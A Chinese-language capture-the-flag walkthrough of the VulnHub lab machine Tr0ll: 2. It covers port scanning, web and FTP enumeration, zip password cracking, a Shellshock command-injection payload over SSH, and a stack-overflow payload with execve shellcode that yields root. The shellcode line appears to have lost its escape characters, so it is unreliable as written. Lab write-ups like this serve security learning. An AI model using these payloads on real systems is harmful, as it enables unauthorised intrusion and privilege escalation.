靶机地址:Tr0ll: 2 ~ VulnHub
难易程度:5.5 / 10.0文章简要记录渗透靶机每一个过程,对于渗透过程中的每一步并非十分的详细,其中部分内容会有错,望读者指出错误,谢谢!
摘要:扫描出21、22、80端口,先从80http服务端口入手,页面搜集得到用户名信息和一个文件,再去21端口ftp服务,获取到一个加密的zip包,使用fcrackzip工具破解该zip包,里面是一个私钥文件,利用shellshock漏洞得到低权限用户,再PWN掉目录中/r00t程序,成功获取到root权限
待完善地方:shellshock漏洞原理,PWN的基本流程步骤|gdb使用
主机探测&端口扫描
靶机ip为:192.168.1.11
端口扫描结果:
hhh@Kali2020:~$ sudo nmap -A -sS -sV -p- -T5 192.168.1.11
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-02 16:51 CST
Nmap scan report for tr0ll2 (192.168.1.11)
Host is up (0.0014s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 82:fe:93:b8:fb:38:a6:77:b5:a6:25:78:6b:35:e2:a8 (DSA)
| 2048 7d:a5:99:b8:fb:67:65:c9:64:86:aa:2c:d6:ca:08:5d (RSA)
|_ 256 91:b8:6a:45:be:41:fd:c8:14:b5:02:a0:66:7c:8c:96 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:B3:C1:10 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
Service Info: Host: Tr0ll; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.36 ms tr0ll2 (192.168.1.11)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.64 seconds
信息搜集
80端口 http服务
在主页源码发现隐藏信息
<!--Nothing here, Try Harder!>
<!--Author: Tr0ll>
<!--Editor: VIM>
打开robots.txt,发现一堆目录,保存下来用dirb跑
wget http://192.168.1.11/robots.txt
dirb http://192.168.1.11 robots.txt
发现有四个目录是正常的
---- Scanning URL: http://192.168.1.11/ ----
+ http://192.168.1.11//noob (CODE:301|SIZE:311)
+ http://192.168.1.11//keep_trying (CODE:301|SIZE:318)
+ http://192.168.1.11//dont_bother (CODE:301|SIZE:318)
+ http://192.168.1.11//ok_this_is_it (CODE:301|SIZE:320)
分别将各个页面中的图片拷贝下来,一个个分析。在/dont_bother目录下的图片发现了提示
> strings dont_bother.jpg
Look Deep within y0ur_self for the answer
前往该目录/y0ur_self,发现一个都是base64字符串的文本,下载后直接base64解密
wget http://192.168.1.11/y0ur_self/answer.txt
base64 -d answer.txt > decode.txt
21端口 ftp服务
根据上面第一个提示,以Tr0ll作为用户名和密码登陆进去,发现有一个lmao.zip,下载下来,但是解压需要密码
hhh@Kali2020:~$ ftp 192.168.1.11
Connected to 192.168.1.11.
220 Welcome to Tr0ll FTP... Only noobs stay for a while...
Name (192.168.1.11:hhh): Tr0ll
331 Please specify the password.
Password:
230 Login successful.
ftp> dir
-rw-r--r-- 1 0 0 1474 Oct 04 2014 lmao.zip
226 Directory send OK.
ftp> get lmao.zip
使用fcrackzip工具跑密码,字典就使用刚刚获取的decode.txt
hhh@Kali2020:~$ fcrackzip -u -D -p decode.txt ./lmao.zip
PASSWORD FOUND!!!!: pw == ItCantReallyBeThisEasyRightLOL
-u:只显示破解出来的密码
-D:指定字典文件
-p:使用字符串作为初始密码文件
解压后得到一个noob文件,查看文件,是一个私钥文件
> file noob
noob: PEM RSA private key
权限获取
使用私钥进行连接
hhh@Kali2020:~$ ssh -i noob noob@192.168.1.11
load pubkey "noob": invalid format
TRY HARDER LOL!
Connection to 192.168.1.11 closed.
回显一条信息后就关闭连接了
这里利用到shellshock漏洞
Shellshock OpenSSH restricted shell RCE/PE Proof of Concept – Zdziarski's Blog of Things
Practical Shellshock Exploitation – Part 1 - Infosec Resources (infosecinstitute.com)
payload如下(不知这里能否称为payload)
ssh -i noob noob@192.168.1.11 -t "() { :;}; /bin/bash"
成功获取到低权限
权限提升
在/nothing_to_see_here目录下,有个r00t程序,通过PWN掉该程序可以得到root权限,具体的分析见下
参考:Vulnhub.com — Tr0ll2 CTF Walkthrough | by Leigh | SecurityBytes
payload如下:
noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door3$ ./r00t $(python -c 'print "A"*268 + "x80xfbxffxbf" + "x90"*16 + "x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1xb0x0bxcdx80"')
总结
- ftp指令
- fcrackzip破解压缩包密码
- shellshock漏洞
- PWN学习
- gdb使用
参考
Vulnhub.com — Tr0ll2 CTF Walkthrough | by Leigh | SecurityBytes
No.9-VulnHub-Tr0ll:2-Walkthrough渗透学习(大余)
vulnhub-writeup/kapi-note.md at master · zionspike/vulnhub-writeup · GitHub